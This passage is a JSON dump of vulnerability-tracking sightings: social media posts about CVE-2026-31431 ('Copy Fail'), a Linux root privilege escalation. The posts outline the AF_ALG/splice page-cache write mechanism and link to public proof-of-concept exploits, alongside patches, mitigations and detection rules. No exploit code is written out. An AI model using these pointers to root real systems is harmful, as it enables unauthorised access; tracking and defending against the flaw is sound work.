prerequisites. All major distros affected.\n\ncopy.fail\nxint.io/blog/copy-fa...\nsecurity-tracker.debian.org/tracker/CVE-...", "creation_timestamp": "2026-04-29T21:44:49.008005Z"}, {"uuid": "f23cfa1d-3744-473a-a897-4824c02e33bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/alice-bot-yay.bsky.social/post/3mko3ezrmcs27", "content": "a 732-byte exploit that silently rooted every linux distro since 2017. one logic bug chained through three kernel mechanisms into a 4-byte page-cache write. no race, no offsets \u2014 just a straight line through the architecture. cve-2026-31431", "creation_timestamp": "2026-04-29T21:50:28.451461Z"}, {"uuid": "405df460-e717-4704-b7f6-8a75362d11ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/cybersecurity.page/post/3mkoidwytne25", "content": "A critical vulnerability, CVE-2026-31431, has been announced, allowing root access on nearly all major Linux distributions. It presents a significant security risk for systems that users can log onto.", "creation_timestamp": "2026-04-30T01:42:30.850563Z"}, {"uuid": "9af1a511-6597-4b41-8473-25197d3ee093", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/what.tf/post/3mko4f4smak24", "content": "\ud83d\udea8 CVE-2026-31431 (Copy Fail)\nGo patch all your Linux distros ASAP.\n\nTL; DR: Easy and portable Linux privilege escalation, a local user is able to become root with very little prerequisites. All major distros affected.\ncopy.fail\nxint.io/blog/copy-fa...\nsecurity-tracker.debian.org/tracker/CVE-...", "creation_timestamp": "2026-04-29T22:08:37.698363Z"}, {"uuid": "b0321749-00f3-4acb-b229-68fcaebcf822", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/what.tf/post/3mko4f5zcjk24", "content": "\ud83d\udea8 CVE-2026-31431 (Copy Fail)\nGo patch all your Linux distros ASAP.\n\nTL; DR: Easy and portable Linux privilege escalation, a local user is able to become root with very little prerequisites. All major distros affected.\ncopy.fail\nxint.io/blog/copy-fa...\nsecurity-tracker.debian.org/tracker/CVE-...", "creation_timestamp": "2026-04-29T22:08:38.219837Z"}, {"uuid": "83440f92-3052-4187-84f6-66780736a681", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/what.tf/post/3mko4f5zcjl24", "content": "\ud83d\udea8 CVE-2026-31431 (Copy Fail)\nGo patch all your Linux distros ASAP.\n\nTL; DR: Easy and portable Linux privilege escalation, a local user is able to become root with very little prerequisites. All major distros affected.\ncopy.fail\nxint.io/blog/copy-fa...\nsecurity-tracker.debian.org/tracker/CVE-...", "creation_timestamp": "2026-04-29T22:08:38.748811Z"}, {"uuid": "ebd55174-6e19-429a-98ec-0175b3f6096c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/tokifu.jp/post/3mko66w3ifk2t", "content": "Copy Fail aka CVE-2026-31431\u3001\u307e\u3060Omarchy\u3067\u306fKernel\u304c\u964d\u3063\u3066\u3053\u306a\u3044\u307f\u305f\u3044\u3060\u306a\u3002Arch Linux\u5074\u3082\u300c4\u6708\u4e2d\u306eKernel update\u3067\u4fee\u6b63\u3055\u308c\u308b\u4e88\u5b9a\u300d\u3068\u3055\u308c\u3066\u3044\u308b\u304c\u3001\u307e\u3060\u3060\u3063\u305f\u307f\u305f\u3044\u3060\u306a\ud83d\udc40", "creation_timestamp": "2026-04-29T22:40:45.133186Z"}, {"uuid": "f76c4d68-3ebc-4595-940c-5011c14a96ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/obivan/statuses/116490412218240083", "content": "CVE-2026-31431 is a Linux LPE, PoC script roots every distrubution shipped since 2017 https://copy.fail/", "creation_timestamp": "2026-04-29T22:43:51.026882Z"}, {"uuid": "353fc869-1d82-4617-b7c6-74e547a39c8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/obivan.infosec.exchange.ap.brid.gy/post/3mko6eh6th3k2", "content": "CVE-2026-31431 is a Linux LPE, PoC script roots every distrubution shipped since 2017 https://copy.fail/", "creation_timestamp": "2026-04-29T22:43:53.685330Z"}, {"uuid": "fec06bab-ebfb-424b-b17b-f8dd5f188833", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/badsectorlabs.com/post/3mko7e2uivk2c", "content": "CopyFail (CVE-2026-31431) in Go. In case you want to get root from a static binary without Python as a dependency.\n\ngithub.com/badsectorlab...", "creation_timestamp": "2026-04-29T23:01:32.409502Z"}, {"uuid": "0a714740-d1c8-4ee3-8532-02e788351aea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pixelsandpulse.bsky.social/post/3mkoa4rz4pa2s", "content": "The 'Copy Fail' (CVE-2026-31431) Linux root exploit is a deterministic LPE that's been in the kernel for years, but some major distros are downplaying its severity. Learn why this page cache overwrite is a critical threat to your\u2026\n\nhttps://www.tpp.blog/1jvud7s\n\n#opensource #cve202631431 #copyfail", "creation_timestamp": "2026-04-29T23:15:21.638149Z"}, {"uuid": "dd8738d1-2087-42a8-8f3d-24780f9812d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/securestep9.bsky.social/post/3mkoaiwjpj226", "content": "\u26a0\ufe0f #Linux: Major Linux distributions are impacted by a Privilege Escalation Vulnerability dubbed \"CopyFail\" (CVE-2026-31431) which sat undetected since 2017. \nA 732-byte Python script allows any user on Linux to become root:\n#CopyFail\n#LPE\n\ud83d\udc47\nwww.cyberkendra.com/2026/04/a-73...", "creation_timestamp": "2026-04-29T23:22:09.951889Z"}, {"uuid": "9b17677e-e848-4150-8b70-e5f81547fbac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/yukotan.bsky.social/post/3mkoaolbcpc2x", "content": "\u5168\u3066\u306e\u30c7\u30a3\u30b9\u30c8\u30ea\u3067\u5f71\u97ff\u304c\u3042\u308b\u30bc\u30ed\u30c7\u30a4\u306e\u8106\u5f31\u6027\u304c\u898b\u3064\u304b\u3063\u305f\u305d\u3046\u3067\u3059\u3002\u7279\u6a29\u6607\u683c\u304c\u53ef\u80fd\u3067\u3059\u3002\n\nCopy Fail \u2014 CVE-2026-31431 \ncopy.fail", "creation_timestamp": "2026-04-29T23:25:22.929541Z"}, {"uuid": "97dd3a18-81b0-4ea8-958d-06d704874b0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/yukotan.bsky.social/post/3mkoavzl5322x", "content": "\u5404\u30c7\u30a3\u30b9\u30c8\u30ea\u306f\u30d1\u30c3\u30c1\u3092\u6e96\u5099\u4e2d\n\nCVE-2026-31431 | Ubuntu \nubuntu.com/security/CVE...\n\nCVE-2026-31431 - Debian\nsecurity-tracker.debian.org/tracker/CVE-...\n\nCVE-2026-31431 - Red Hat Customer Portal \naccess.redhat.com/security/cve...\n\nCVE-2026-31431 - Amazon Linux\nexplore.alas.aws.amazon.com/CVE-2026-314...", "creation_timestamp": "2026-04-29T23:29:28.568724Z"}, {"uuid": "8e996ec9-950f-489e-8894-1b1c9974ffb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/grenkoca/b82281a4706e936072979acf54b608df", "content": "", "creation_timestamp": "2026-04-29T23:47:58.000000Z"}, {"uuid": "b0af9e93-4459-4225-9081-0ad38968f925", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/baldanders.info/post/3mkoc3legu52u", "content": "CVE-2026-31431\nnvd.nist.gov/vuln/detail/CV...\nwww.cve.org/CVERecord?id=CV...\n\n\uff1eAn unprivileged local user can write 4 controlled bytes into the page cache of any readable file on a Linux system, and use that to gain root.\ncopy.fail/", "creation_timestamp": "2026-04-29T23:50:28.497962Z"}, {"uuid": "e5a78f0b-9c46-414b-ac91-375187adc525", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/mstdn.baldanders.info/post/3mkoc3oq3cgg2", "content": "CVE-2026-31431\nhttps://nvd.nist.gov/vuln/detail/CVE-2026-31431\nhttps://www.cve.org/CVERecord?id=CVE-2026-31431\n\n\uff1eAn unprivileged local user can write 4 controlled bytes into the page cache of any readable file on a Linux system, and use that to gain root.\nhttps://copy.fail/", "creation_timestamp": "2026-04-29T23:50:37.055169Z"}, {"uuid": "7fe92ba3-8f07-4a4b-a72f-d70d35773196", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/undercodenews.bsky.social/post/3mkovsybku62y", "content": "Linux Kernel \u201cCopy Fail\u201d Zero-Day Exposes Millions of Systems to Instant Root\u00a0Access\n\nIntroduction A newly disclosed Linux kernel vulnerability is raising serious alarms across the cybersecurity world. Tracked as CVE-2026-31431 and nicknamed Copy Fail, the flaw allows any unprivileged local user to\u2026", "creation_timestamp": "2026-04-30T05:43:34.505561Z"}, {"uuid": "9549cf8e-aa3b-47ca-a1b3-689b5ffa223c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/noisytoot.berkeley.edu.pl.ap.brid.gy/post/3mkoqdhkokw62", "content": "Want to make your system immune to copyfail (CVE-2026-31431) but compiled your kernel with CONFIG_CRYPTO_USER_API_AEAD=y so you can\u2019t disable the module and don\u2019t want to reboot? Use BPF-LSM to block AF_ALG sockets from being created!\n\n\n    /* SPDX-License-Identifier: GPL-2.0-or-later OR MIT */ [\u2026]", "creation_timestamp": "2026-04-30T04:05:26.578752Z"}, {"uuid": "761032e2-b912-4550-8e0f-b5aaf8e755be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/torrycrass.bsky.social/post/3mkorw3py6s2v", "content": "I haven't been able to test everything (yet), these are some possible detections for #cve-2026-31431 for Wazuh, Auditd and MISP and YARA items.\n\nTesting is needed. Please drop a PR if you have better updates to what's here.\n\ngithub.com/insomnisec/D...\n\n#cyber #linux #lpe #vulnerability #cve", "creation_timestamp": "2026-04-30T04:33:45.707329Z"}, {"uuid": "def1ee7e-dae5-4960-b564-44d740ab19a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/potato.software/post/3mkorw6j4zq2c", "content": "I haven't been able to test everything (yet), these are some possible detections for #cve-2026-31431 for Wazuh, Auditd and MISP and YARA items.\n\nTesting is needed. Please drop a PR if you have better updates to what's here.\n\ngithub.com/insomnisec/D...\n\n#potato #linux #lpe #vulnerability #cve", "creation_timestamp": "2026-04-30T04:33:46.420245Z"}, {"uuid": "37d3a11b-2a74-40cb-8ff9-232a97563dfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkosagsnim24", "content": "Copy Fail: Public PoC and Full Details Disclosed for the 732-Byte Linux Root Exploit (CVE-2026-31431)", "creation_timestamp": "2026-04-30T04:39:31.025179Z"}, {"uuid": "2796648a-26cd-49d1-b145-6407bf23a5e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/aprosdoketon.bsky.social/post/3mkozudv6u226", "content": "CVE-2026-31431 \u043f\u0456\u0434\u0432\u0438\u0449\u0435\u043d\u043d\u044f \u043f\u0440\u0438\u0432\u0456\u043b\u0435\u0457\u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e \u0443 \u043b\u0456\u043d\u0443\u043a\u0441\u0456, \u0437 2017-\u0433\u043e \u0440\u043e\u043a\u0443 \u0434\u043e \u0441\u044c\u043e\u0433\u043e\u0434\u043d\u0456", "creation_timestamp": "2026-04-30T06:55:54.503883Z"}, {"uuid": "4633af7b-c533-4a68-adc6-2548cbeb259b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/blackhatnews.tokyo/post/3mkosyq3jxw2v", "content": "Linux Kernel 0-Day\u300cCopy Fail\u300d\u304c2017\u5e74\u4ee5\u6765\u3001\u4e3b\u8981\u306a\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u5168\u4f53\u3067\u30eb\u30fc\u30c8\u30a2\u30af\u30bb\u30b9\u3092\u53ef\u80fd\u306b\n\n\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u7814\u7a76\u8005\u306f\u3001Linux \u30ab\u30fc\u30cd\u30eb\u306e\u91cd\u5927\u306a\u30bc\u30ed\u30c7\u30a4\u8106\u5f31\u6027\u300cCopy Fail\u300d\uff08CVE-2026-31431\uff09\u3092\u958b\u793a\u3057\u307e\u3057\u305f\u3002\u3053\u308c\u306f\u7279\u6a29\u306e\u306a\u3044\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u304c\u30eb\u30fc\u30c8\u30a2\u30af\u30bb\u30b9\u3092\u53d6\u5f97\u3059\u308b\u3053\u3068\u3092\u53ef\u80fd\u306b\u3057\u307e\u3059\u3002 \u308f\u305a\u304b732\u30d0\u30a4\u30c8\u306ePython\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u4f7f\u7528\u3057\u3066\u3001\u653b\u6483\u8005\u306f2017\u5e74\u4ee5\u964d\u306b\u30ea\u30ea\u30fc\u30b9\u3055\u308c\u305f\u4e3b\u8981\u306aLin", "creation_timestamp": "2026-04-30T04:53:05.678659Z"}, {"uuid": "32d31a8c-4330-4207-a27a-aa8e9f2dbcfc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/epowo-uzata.mast.qixto.com.ap.brid.gy/post/3mkotgggappl2", "content": "Linux-ytimen virhe mahdollistaa 10-rivisen p\u00e4\u00e4k\u00e4ytt\u00e4j\u00e4n oikeuksien hy\u00f6dynt\u00e4misen Paikallisen oikeuksien eskalointihaavoittuvuus, nimelt\u00e4\u00e4n Copy Fail (CVE-2026-31431)\n\nhttps://www.theregister.com/2026/04/30/linux_cryptographic_code_flaw/", "creation_timestamp": "2026-04-30T05:01:53.898893Z"}, {"uuid": "4fd1a600-e0df-42fc-bb1f-558abed90797", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hacker-news-jp.bsky.social/post/3mkoihagbr32i", "content": "\u30b3\u30d4\u30fc\u5931\u6557 \u2013 CVE-2026-31431\nCopy Fail \u2013 CVE-2026-31431\n\n\ud83d\udd3a 571\n\ud83d\udcac 57\n\ud83d\udd17 HN Post | Article", "creation_timestamp": "2026-04-30T01:44:21.810420Z"}, {"uuid": "cdb6c623-195f-4024-8e8a-a467b2ab68db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hacker-news-jp.bsky.social/post/3mkoihiigtm2l", "content": "\ud83d\udca1 Summary: \n\nCopy Fail\u306f\u30012017\u5e74\u4ee5\u964d\u306e\u307b\u307c\u5168\u3066\u306e\u4e3b\u6d41Linux\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u3067\u5171\u901a\u3057\u3066\u5b58\u5728\u3059\u308b\u3001\u6a29\u9650\u306e\u306a\u3044\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u304c\u30da\u30fc\u30b8\u30ad\u30e3\u30c3\u30b7\u30e5\u30784\u30d0\u30a4\u30c8\u3092\u66f8\u304d\u8fbc\u307f\u3001root\u6a29\u9650\u3092\u53d6\u5f97\u3067\u304d\u308b\u76f4\u7dda\u7684\u306aLPE\uff08CVE-2026-31431\uff09\u3067\u3059\u3002\u5f71\u97ff\u306fAF_ALG\u3092\u7d4c\u7531\u3057\u305f\u6697\u53f7\u51e6\u7406\u7d4c\u8def\u306e\u4e0d\u5177\u5408\u3092\u7a81\u304f\u3082\u306e\u3067\u3001\u30d1\u30c3\u30c1\u9069\u7528\u5f8c\u306f\u518d\u73fe\u6027\u304c\u4f4e\u4e0b\u3057\u307e\u3059\u304c\u3001\u672a\u30d1\u30c3\u30c1\u74b0\u5883\u3067\u306f\u30b3\u30f3\u30c6\u30ca\u9593\u306e\u5883\u754c\u3092\u8d8a\u3048\u308b\u5371\u967a\u6027\u304c\u3042\u308a\u307e\u3059\u3002\u5bfe\u7b56\u306f\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u306e\u30ab\u30fc\u30cd\u30eb\u3092\u30d1\u30c3\u30c1\u6e08\u307f\u30d0\u30fc\u30b8\u30e7\u30f3\u3078\u66f4\u65b0\u3059\u308b\u3053\u3068\u3001\u5fc5\u8981\u306b\u5fdc\u3058\u3066AF_ALG\u306e\u7121\u52b9\u5316\u3068\u30bb\u30ad\u30e5\u30a2\u30e2\u30fc\u30c9\u306e\u9069\u7528\u3067\u3059\u3002", "creation_timestamp": "2026-04-30T01:44:29.681560Z"}, {"uuid": "62994e63-2259-4908-8f71-f813c137814e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/isAutonomous.karlsruhe-social.de.ap.brid.gy/post/3mkp2l43g5q72", "content": "@giggls Verdammt, ja. Das ist die richtige ID:\nhttps://euvd.enisa.europa.eu/vulnerability/CVE-2026-31431\n\nDie Bezeichnungen bei den Europ\u00e4ern sind irritierend. Warum m\u00fcssen die eigene Nummern vergeben?\n\"EUVD-2026-24639\"", "creation_timestamp": "2026-04-30T07:08:39.517074Z"}, {"uuid": "d82099a4-83ae-4417-8cdf-1a3fda3addb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/adriend.linuxtricks.fr/post/3mkp2kqi6ts2y", "content": "Au boulot, exploit impossible, l'EDR g\u00e8re le truc.\nOUF ! \n\nsuccessfully killed the threat copy_fail_exp.py on Thu, 30 Apr 2026, 06:40:56 UTC.\nThreat path: /home/test/copy-fail-CVE-2026-31431/copy_fail_exp.py", "creation_timestamp": "2026-04-30T07:08:57.627559Z"}, {"uuid": "5f370959-431e-4dee-9a86-55ac07b0beb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3mkp35z5p4l2l", "content": "\u300cCopy Fail\u300dCVE-2026-31431 \u2014 9\u5e74\u9593\u6f5c\u3093\u3067\u3044\u305f732\u30d0\u30a4\u30c8Python\u3067Linux\u304croot\u5316\u3055\u308c\u308b\u8106\u5f31\u6027\u3068\u5bfe\u7b56\uff5czephel01\nhttps://note.com/zephel01/n/n7fa6564b43cf", "creation_timestamp": "2026-04-30T07:19:13.256066Z"}, {"uuid": "6c3ff9ed-6fef-40b6-aaf0-60aa7f4ff347", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/116491233168370853", "content": "Some increased actor activities are shown targeting Linux Kernel (CVE-2026-31431) https://vuldb.com/vuln/358784/cti", "creation_timestamp": "2026-04-30T02:12:35.398337Z"}, {"uuid": "117855a9-2d27-49f2-a6a7-2c63aaeed452", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/cyberveille-ch.bsky.social/post/3mkpe6c6sob2w", "content": "\ud83d\udce2 CVE-2026-31431 ' Copy Fail ' : escalade de privil\u00e8ges root en 732 octets sur toutes les distributions Linux majeures\n\ud83d\udcdd ## \ud83d\udd0d \u2026\nhttps://cyberveille.ch/posts/2026-04-30-cve-2026-31431-copy-fail-escalade-de-privileges-root-en-732-octets-sur-toutes-les-distributions-linux-majeures/ #AF_ALG #Cyberveille", "creation_timestamp": "2026-04-30T10:00:30.775814Z"}, {"uuid": "12938e02-e884-4e2b-8e2c-a76ceccbf3ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://vulnerability.circl.lu/comment/015dc7f6-33e1-49b4-af56-d27f0111165a", "content": "", "creation_timestamp": "2026-04-30T10:07:37.566466Z"}, {"uuid": "307259fc-f3b7-4f23-b613-784c77ef7535", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mkokzbugzf2x", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 53 interactions\nCVE-2026-3854: 48 interactions\nCVE-2026-42208: 22 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-31431: 53 interactions\nCVE-2026-3854: 31 interactions\nCVE-2026-5545: 17 interactions\n", "creation_timestamp": "2026-04-30T02:30:14.165185Z"}, {"uuid": "4921249e-f608-47dd-97c5-1bde251f66ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/egghat.mastodon.social.ap.brid.gy/post/3mkpejaxv75w2", "content": "Oops.\n\n\u201eIf your kernel was built between 2017 and the patch \u2014 which covers essentially every mainstream Linux distribution \u2014 you're in scope.\u201c\n\nCopy Fail \u2014 CVE-2026-31431 https://copy.fail/\n#BadNews", "creation_timestamp": "2026-04-30T10:06:38.752696Z"}, {"uuid": "d5e51604-ebc9-4aaa-bae2-901046fc723b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/mueritz98.bsky.social/post/3mkpepdc5l22p", "content": "This blog from #XintCode Research Team is absolut brilliant! Their #CopyFail exploit on CVE-2026-31431 is simply fascinating. A must read detail on their description of the route to \"732 Bytes to #Root on Every Major #Linux Distribution\" #Cyber #CVE \n\nxint.io/blog/copy-fa...", "creation_timestamp": "2026-04-30T10:10:00.533494Z"}, {"uuid": "71cd5765-9b29-4b11-8473-f18afb9a892f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/geeknewsbot.bsky.social/post/3mkompcpg7w2l", "content": "Copy Fail \u2013 CVE-2026-31431\n\n\ube44\ud2b9\uad8c \ub85c\uceec \uc0ac\uc6a9\uc790 \uac00 authencesn , AF_ALG , splice() \ub97c \uc5f0\uacb0\ud574 \uc77d\uae30 \uac00\ub2a5\ud55c \ud30c\uc77c\uc758 \ud398\uc774\uc9c0 \uce90\uc2dc 4\ubc14\uc774\ud2b8 \uc4f0\uae30 \ub97c \ub9cc\ub4e4\uace0, \uc774\ub97c \ud1b5\ud574 root \uad8c\ud55c\uae4c\uc9c0 \uc62c\ub9b4 \uc218 \uc788\uc74c \ucee4\ub110\ubcc4 \uc624\ud504\uc14b\uc774\ub098 \ub808\uc774\uc2a4 \uc870\uac74 \uc5c6\uc774 732\ubc14\uc774\ud2b8 Pyt...", "creation_timestamp": "2026-04-30T03:00:27.060755Z"}, {"uuid": "188366c0-9671-453e-9d60-f54b8161f9a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Kubernetes.activitypub.awakari.com.ap.brid.gy/post/3mkperxdnzkx2", "content": "Copy-fail-destroyer: K8s remediation for CVE-2026-31431 Article URL: https://github.com/NorskHelsenett/copy-fail-destroyer Comments URL: https://news.ycombinator.com/item?id=47960232 Points: 1 # Co...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T10:11:29.000132Z"}, {"uuid": "5be6d455-e9c0-4488-9512-0e62aee958d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3mkpey2aqeq2s", "content": "Linux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u300cCopyFail (CVE-2026-31431)\u300d\u3092EC2\u306eUbuntu 22.04\u3067\u5b9f\u8a3c\u3057\u3066\u307f\u305f\nhttps://zenn.dev/aeyesec/articles/7e4a1e3c83e81b", "creation_timestamp": "2026-04-30T10:14:52.493977Z"}, {"uuid": "f3c802fc-4aa8-4192-abb0-2628993aa5f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/blackhatnews.tokyo/post/3mkpf4u2awz27", "content": "Linux\u30ab\u30fc\u30cd\u30eb\u306e\u300cCopy 